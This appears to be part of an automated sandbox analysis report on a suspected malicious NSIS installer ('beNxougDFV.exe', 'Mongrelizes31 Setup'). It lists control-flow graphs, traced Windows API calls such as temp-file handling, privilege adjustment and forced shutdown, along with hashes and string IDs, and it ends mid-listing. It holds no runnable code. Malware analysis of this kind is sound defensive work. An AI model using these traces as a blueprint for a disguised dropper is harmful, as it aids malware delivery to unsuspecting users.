40369b-40369f ExitProcess 76->80 82 403503-403517 call 4055b6 lstrcatA 77->82 83 40349e-4034ab call 4059b5 77->83 86 403489-40348b 78->86 79->80 95 403524-40353e lstrcatA lstrcmpiA 82->95 96 403519-40351f lstrcatA 82->96 83->59 94 4034ad-4034c3 call 405f2f * 2 83->94 97 40367a-403684 ExitWindowsEx 84->97 98 40366e-403678 84->98 85->84 86->77 87 40348d-403490 86->87 87->77 87->86 94->64 95->59 100 403540-403543 95->100 96->95 97->76 101 403686-403688 call 40140b 97->101 98->97 98->101 103 403545-40354a call 40551c 100->103 104 40354c call 405599 100->104 101->76 112 403551-40355e SetCurrentDirectoryA 103->112 104->112 113 403560-403566 call 405f2f 112->113 114 40356b-403593 call 405f2f 112->114 113->114 118 403599-4035b5 call 405f51 DeleteFileA 114->118 121 4035f6-4035fd 118->121 122 4035b7-4035c7 CopyFileA 118->122 121->118 123 4035ff-403606 call 405d0e 121->123 122->121 124 4035c9-4035e9 call 405d0e call 405f51 call 4055ce 122->124 123->59 124->121 133 4035eb-4035f2 CloseHandle 124->133 133->121
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004031E0
                                        • GetVersion.KERNEL32 ref: 004031E6
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403219
                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403255
                                        • OleInitialize.OLE32(00000000), ref: 0040325C
                                        • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403278
                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 0040328D
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\beNxougDFV.exe",00000000,?,00000006,00000008,0000000A), ref: 004032A0
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\beNxougDFV.exe",00000020,?,00000006,00000008,0000000A), ref: 004032CB
                                        • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033C8
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033D9
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033E5
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033F9
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403401
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403412
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040341A
                                        • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040342E
                                          • Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                          • Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                          • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                          • Part of subcall function 0040377F: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410), ref: 0040386F
                                          • Part of subcall function 0040377F: lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
                                          • Part of subcall function 0040377F: GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
                                          • Part of subcall function 0040377F: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
                                          • Part of subcall function 0040377F: RegisterClassA.USER32(00422EA0), ref: 00403913
                                          • Part of subcall function 004036A5: CloseHandle.KERNEL32(000002D8,004034DC,?,?,00000006,00000008,0000000A), ref: 004036B0
                                        • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034DC
                                        • ExitProcess.KERNEL32 ref: 004034FD
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040361A
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403621
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403639
                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403658
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040367C
                                        • ExitProcess.KERNEL32 ref: 0040369F
                                          • Part of subcall function 0040564B: MessageBoxIndirectA.USER32(00409218), ref: 004056A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                        • String ID: "$"C:\Users\user\Desktop\beNxougDFV.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\Desktop$C:\Users\user\Desktop\beNxougDFV.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                        • API String ID: 3855923921-1321654302
                                        • Opcode ID: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
                                        • Instruction ID: af4360d81dc256b8c9424dc56f1358f7fe08c6a718ebf40f6c8df5272bc15683
                                        • Opcode Fuzzy Hash: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
                                        • Instruction Fuzzy Hash: 14C1F5706086427AE7217F719D49B2B3EACEB85306F04457FF541B62E2C77C9A058B2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 134 405194-4051b0 135 4051b6-40527d GetDlgItem * 3 call 404025 call 4048f4 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 40533f-405345 134->136 154 40529b-40529e 135->154 155 40527f-405299 SendMessageA * 2 135->155 138 405347-405369 GetDlgItem CreateThread CloseHandle 136->138 139 40536f-40537b 136->139 138->139 140 40539d-4053a3 139->140 141 40537d-405383 139->141 145 4053a5-4053ab 140->145 146 4053f8-4053fb 140->146 143 405385-405398 ShowWindow * 2 call 404025 141->143 144 4053be-4053c5 call 404057 141->144 143->140 158 4053ca-4053ce 144->158 151 4053d1-4053e1 ShowWindow 145->151 152 4053ad-4053b9 call 403fc9 145->152 146->144 149 4053fd-405403 146->149 149->144 156 405405-405418 SendMessageA 149->156 159 4053f1-4053f3 call 403fc9 151->159 160 4053e3-4053ec call 405056 151->160 152->144 161 4052a0-4052ac SendMessageA 154->161 162 4052ae-4052c5 call 403ff0 154->162 155->154 163 405515-405517 156->163 164 40541e-40544a CreatePopupMenu call 405f51 AppendMenuA 156->164 159->146 160->159 161->162 173 4052c7-4052db ShowWindow 162->173 174 4052fb-40531c GetDlgItem SendMessageA 162->174 163->158 171 40544c-40545c GetWindowRect 164->171 172 40545f-405475 TrackPopupMenu 164->172 171->172 172->163 175 40547b-405495 172->175 176 4052ea 173->176 177 4052dd-4052e8 ShowWindow 173->177 174->163 178 405322-40533a SendMessageA * 2 174->178 179 40549a-4054b5 SendMessageA 175->179 180 4052f0-4052f6 call 404025 176->180 177->180 178->163 179->179 181 4054b7-4054d7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 4054d9-4054f9 SendMessageA 181->183 183->183 184 4054fb-40550f GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 004051F3
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405202
                                        • GetClientRect.USER32(?,?), ref: 0040523F
                                        • GetSystemMetrics.USER32(00000002), ref: 00405246
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405267
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405278
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040528B
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405299
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052AC
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052CE
                                        • ShowWindow.USER32(?,00000008), ref: 004052E2
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405303
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405313
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040532C
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405338
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405211
                                          • Part of subcall function 00404025: SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405354
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005128,00000000), ref: 00405362
                                        • CloseHandle.KERNELBASE(00000000), ref: 00405369
                                        • ShowWindow.USER32(00000000), ref: 0040538C
                                        • ShowWindow.USER32(?,00000008), ref: 00405393
                                        • ShowWindow.USER32(00000008), ref: 004053D9
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540D
                                        • CreatePopupMenu.USER32 ref: 0040541E
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405433
                                        • GetWindowRect.USER32(?,000000FF), ref: 00405453
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040546C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054A8
                                        • OpenClipboard.USER32(00000000), ref: 004054B8
                                        • EmptyClipboard.USER32 ref: 004054BE
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004054C7
                                        • GlobalLock.KERNEL32(00000000), ref: 004054D1
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E5
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004054FE
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405509
                                        • CloseClipboard.USER32 ref: 0040550F
                                        Strings
                                        • Mongrelizes31 Setup: Completed, xrefs: 00405484
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: Mongrelizes31 Setup: Completed
                                        • API String ID: 590372296-1023628639
                                        • Opcode ID: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
                                        • Instruction ID: ffe0cad38c51bf677d90d52cc1be9089f0253f1d9aa70b106fb857e880bd7d9d
                                        • Opcode Fuzzy Hash: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
                                        • Instruction Fuzzy Hash: B5A15AB1900208BFDB119FA4DD89AAE7F79FB08355F00403AFA05B62A0C7B55E51DF69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 493 4056f7-40571d call 4059b5 496 405736-40573d 493->496 497 40571f-405731 DeleteFileA 493->497 499 405750-405760 call 405f2f 496->499 500 40573f-405741 496->500 498 4058c0-4058c4 497->498 508 405762-40576d lstrcatA 499->508 509 40576f-405770 call 40590e 499->509 501 405747-40574a 500->501 502 40586e-405873 500->502 501->499 501->502 502->498 504 405875-405878 502->504 506 405882-40588a call 406232 504->506 507 40587a-405880 504->507 506->498 517 40588c-4058a0 call 4058c7 call 4056af 506->517 507->498 511 405775-405778 508->511 509->511 514 405783-405789 lstrcatA 511->514 515 40577a-405781 511->515 516 40578e-4057ac lstrlenA FindFirstFileA 514->516 515->514 515->516 518 4057b2-4057c9 call 4058f2 516->518 519 405864-405868 516->519 532 4058a2-4058a5 517->532 533 4058b8-4058bb call 405056 517->533 526 4057d4-4057d7 518->526 527 4057cb-4057cf 518->527 519->502 521 40586a 519->521 521->502 530 4057d9-4057de 526->530 531 4057ea-4057f8 call 405f2f 526->531 527->526 529 4057d1 527->529 529->526 535 4057e0-4057e2 530->535 536 405843-405855 FindNextFileA 530->536 543 4057fa-405802 531->543 544 40580f-40581a call 4056af 531->544 532->507 538 4058a7-4058b6 call 405056 call 405d0e 532->538 533->498 535->531 539 4057e4-4057e8 535->539 536->518 541 40585b-40585e FindClose 536->541 538->498 539->531 539->536 541->519 543->536 548 405804-40580d call 4056f7 543->548 553 40583b-40583e call 405056 544->553 554 40581c-40581f 544->554 548->536 553->536 555 405821-405831 call 405056 call 405d0e 554->555 556 405833-405839 554->556 555->536 556->536
                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405720
                                        • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405768
                                        • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405789
                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040578F
                                        • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A0
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040584D
                                        • FindClose.KERNEL32(00000000), ref: 0040585E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405704
                                        • "C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 004056F7
                                        • \*.*, xrefs: 00405762
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-82508183
                                        • Opcode ID: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
                                        • Instruction ID: 5202cdaf7196988d1da3935d2d892696f3640e5f60657e92f8c59f35d89726bd
                                        • Opcode Fuzzy Hash: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
                                        • Instruction Fuzzy Hash: 02519F32800A04BADB217B618C45BAF7B78DF42754F14847BF851761D2D73C8A92DEAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 759 4065bb-4065c0 760 406631-40664f 759->760 761 4065c2-4065f1 759->761 764 406c27-406c3c 760->764 762 4065f3-4065f6 761->762 763 4065f8-4065fc 761->763 765 406608-40660b 762->765 768 406604 763->768 769 4065fe-406602 763->769 766 406c56-406c6c 764->766 767 406c3e-406c54 764->767 771 406629-40662c 765->771 772 40660d-406616 765->772 770 406c6f-406c76 766->770 767->770 768->765 769->765 773 406c78-406c7c 770->773 774 406c9d-406ca9 770->774 777 4067fe-40681c 771->777 775 406618 772->775 776 40661b-406627 772->776 780 406c82-406c9a 773->780 781 406e2b-406e35 773->781 787 40643f-406448 774->787 775->776 783 406691-4066bf 776->783 778 406834-406846 777->778 779 40681e-406832 777->779 786 406849-406853 778->786 779->786 780->774 788 406e41-406e54 781->788 784 4066c1-4066d9 783->784 785 4066db-4066f5 783->785 789 4066f8-406702 784->789 785->789 790 406855 786->790 791 4067f6-4067fc 786->791 792 406e56 787->792 793 40644e 787->793 794 406e59-406e5d 788->794 796 406708 789->796 797 406679-40667f 789->797 798 4067d1-4067d5 790->798 799 406966-406973 790->799 791->777 795 40679a-4067a4 791->795 792->794 800 406455-406459 793->800 801 406595-4065b6 793->801 802 4064fa-4064fe 793->802 803 40656a-40656e 793->803 813 406de9-406df3 795->813 814 4067aa-4067cc 795->814 818 406dc5-406dcf 796->818 819 40665e-406676 796->819 815 406732-406738 797->815 816 406685-40668b 797->816 804 4067db-4067f3 798->804 805 406ddd-406de7 798->805 799->787 810 4069c2-4069d1 799->810 800->788 809 40645f-40646c 800->809 801->764 806 406504-40651d 802->806 807 406daa-406db4 802->807 811 406574-406588 803->811 812 406db9-406dc3 803->812 804->791 805->788 821 406520-406524 806->821 807->788 809->792 817 406472-4064b8 809->817 810->764 823 40658b-406593 811->823 812->788 813->788 814->799 820 406796 815->820 822 40673a-406758 815->822 816->783 816->820 827 4064e0-4064e2 817->827 828 4064ba-4064be 817->828 818->788 819->797 820->795 821->802 824 406526-40652c 821->824 825 406770-406782 822->825 826 40675a-40676e 822->826 823->801 823->803 833 406556-406568 824->833 834 40652e-406535 824->834 835 406785-40678f 825->835 826->835 831 4064f0-4064f8 827->831 832 4064e4-4064ee 827->832 829 4064c0-4064c3 GlobalFree 828->829 830 4064c9-4064d7 GlobalAlloc 828->830 829->830 830->792 839 4064dd 830->839 831->821 832->831 832->832 833->823 836 406540-406550 GlobalAlloc 834->836 837 406537-40653a GlobalFree 834->837 835->815 838 406791 835->838 836->792 836->833 837->836 841 406dd1-406ddb 838->841 842 406717-40672f 838->842 839->827 841->788 842->815
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
                                        • Instruction ID: 82117b2ed1b037f842d7e8ec4a077ce5a2ba4b06f200654bc1e2ca7552b06de8
                                        • Opcode Fuzzy Hash: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
                                        • Instruction Fuzzy Hash: BCF16474D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                        APIs
                                        • FindFirstFileA.KERNELBASE(774D3410,00421558,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,004059F8,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040623D
                                        • FindClose.KERNEL32(00000000), ref: 00406249
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsw599B.tmp, xrefs: 00406232
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsw599B.tmp
                                        • API String ID: 2295610775-160415898
                                        • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                        • Instruction ID: 7cf403c7a0a34fa6c1bdd97e039e734b9fb45dc45bcdba9fead32da54c1b9644
                                        • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                        • Instruction Fuzzy Hash: 19D0C9329090206BC3106628AC0C84B6A599B953717118A76B56AF12E0D238986286A9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 185 403b1c-403b2e 186 403b34-403b3a 185->186 187 403c6f-403c7e 185->187 186->187 188 403b40-403b49 186->188 189 403c80-403cc8 GetDlgItem * 2 call 403ff0 SetClassLongA call 40140b 187->189 190 403ccd-403ce2 187->190 193 403b4b-403b58 SetWindowPos 188->193 194 403b5e-403b61 188->194 189->190 191 403d22-403d27 call 40403c 190->191 192 403ce4-403ce7 190->192 207 403d2c-403d47 191->207 197 403ce9-403cf4 call 401389 192->197 198 403d1a-403d1c 192->198 193->194 200 403b63-403b75 ShowWindow 194->200 201 403b7b-403b81 194->201 197->198 220 403cf6-403d15 SendMessageA 197->220 198->191 206 403fbd 198->206 200->201 203 403b83-403b98 DestroyWindow 201->203 204 403b9d-403ba0 201->204 209 403f9a-403fa0 203->209 211 403ba2-403bae SetWindowLongA 204->211 212 403bb3-403bb9 204->212 210 403fbf-403fc6 206->210 214 403d50-403d56 207->214 215 403d49-403d4b call 40140b 207->215 209->206 222 403fa2-403fa8 209->222 211->210 218 403c5c-403c6a call 404057 212->218 219 403bbf-403bd0 GetDlgItem 212->219 216 403f7b-403f94 DestroyWindow EndDialog 214->216 217 403d5c-403d67 214->217 215->214 216->209 217->216 224 403d6d-403dba call 405f51 call 403ff0 * 3 GetDlgItem 217->224 218->210 225 403bd2-403be9 SendMessageA IsWindowEnabled 219->225 226 403bef-403bf2 219->226 220->210 222->206 223 403faa-403fb3 ShowWindow 222->223 223->206 255 403dc4-403e00 ShowWindow KiUserCallbackDispatcher call 404012 EnableWindow 224->255 256 403dbc-403dc1 224->256 225->206 225->226 229 403bf4-403bf5 226->229 230 403bf7-403bfa 226->230 233 403c25-403c2a call 403fc9 229->233 234 403c08-403c0d 230->234 235 403bfc-403c02 230->235 233->218 238 403c43-403c56 SendMessageA 234->238 240 403c0f-403c15 234->240 235->238 239 403c04-403c06 235->239 238->218 239->233 243 403c17-403c1d call 40140b 240->243 244 403c2c-403c35 call 40140b 240->244 251 403c23 243->251 244->218 253 403c37-403c41 244->253 251->233 253->251 259 403e02-403e03 255->259 260 403e05 255->260 256->255 261 403e07-403e35 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e37-403e48 SendMessageA 261->262 263 403e4a 261->263 264 403e50-403e8a call 404025 call 403afd call 405f2f lstrlenA call 405f51 SetWindowTextA call 401389 262->264 263->264 264->207 275 403e90-403e92 264->275 275->207 276 403e98-403e9c 275->276 277 403ebb-403ecf DestroyWindow 276->277 278 403e9e-403ea4 276->278 277->209 280 403ed5-403f02 CreateDialogParamA 277->280 278->206 279 403eaa-403eb0 278->279 279->207 281 403eb6 279->281 280->209 282 403f08-403f5f call 403ff0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->206 282->206 287 403f61-403f74 ShowWindow call 40403c 282->287 289 403f79 287->289 289->209
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B58
                                        • ShowWindow.USER32(?), ref: 00403B75
                                        • DestroyWindow.USER32 ref: 00403B89
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA5
                                        • GetDlgItem.USER32(?,?), ref: 00403BC6
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BDA
                                        • IsWindowEnabled.USER32(00000000), ref: 00403BE1
                                        • GetDlgItem.USER32(?,00000001), ref: 00403C8F
                                        • GetDlgItem.USER32(?,00000002), ref: 00403C99
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB3
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D04
                                        • GetDlgItem.USER32(?,00000003), ref: 00403DAA
                                        • ShowWindow.USER32(00000000,?), ref: 00403DCB
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDD
                                        • EnableWindow.USER32(?,?), ref: 00403DF8
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0E
                                        • EnableMenuItem.USER32(00000000), ref: 00403E15
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2D
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E40
                                        • lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,?,Mongrelizes31 Setup: Completed,00000000), ref: 00403E6A
                                        • SetWindowTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 00403E79
                                        • ShowWindow.USER32(?,0000000A), ref: 00403FAD
                                        Strings
                                        Memory Dump Source
